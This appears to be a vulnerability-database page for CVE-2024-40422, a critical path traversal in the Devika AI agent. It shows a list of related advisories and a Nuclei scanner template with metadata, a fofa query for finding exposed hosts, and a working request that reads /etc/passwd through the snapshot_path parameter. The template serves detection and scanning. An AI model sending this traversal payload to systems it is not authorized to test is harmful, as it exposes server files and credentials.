| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Devika v1 - Path Traversal via (snapshot_path) Exploit | 4 Aug 202400:00 | – | zdt | |
| CVE-2024-40422 | 24 Jul 202419:09 | – | circl | |
| Devika 路径遍历漏洞 | 24 Jul 202400:00 | – | cnnvd | |
| CVE-2024-40422 | 24 Jul 202400:00 | – | cve | |
| CVE-2024-40422 | 24 Jul 202400:00 | – | cvelist | |
| Devika v1 - Path Traversal via 'snapshot_path' | 4 Aug 202400:00 | – | exploitdb | |
| Exploit for Cross-site Scripting in Flatpress | 28 Jan 202521:16 | – | githubexploit | |
| Exploit for Path Traversal in Stitionai Devika | 6 Aug 202407:09 | – | githubexploit | |
| CVE-2024-40422 | 24 Jul 202416:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check | 26 Sep 201700:00 | – | openvas |
id: CVE-2024-40422
info:
name: Devika v1 - Path Traversal
author: s4e-io,alpernae
severity: critical
description: |
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
impact: |
Unauthenticated attackers can exploit path traversal to access sensitive files on the server.
remediation: |
Update Devika to a version later than v1 that patches the path traversal vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-40422
- https://cvefeed.io/vuln/detail/CVE-2024-40422
- https://github.com/alpernae/CVE-2024-40422
- https://github.com/stitionai/devika
- https://www.exploit-db.com/exploits/52066
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-40422
cwe-id: CWE-22
epss-score: 0.11414
epss-percentile: 0.95466
cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: stitionai
product: devika
fofa-query: icon_hash="-1429839495"
tags: cve,cve2024,devika,lfi,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /api/data HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
- 'contains(content_type,"application/json")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a00473045022062098ad3af4e4166812cce9a655359beac6ab0ddf58c6341b9f31202f37e86f3022100df93697976f40f39be73dc449402e1989bf34808f2347208611edeaf730d1d7b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation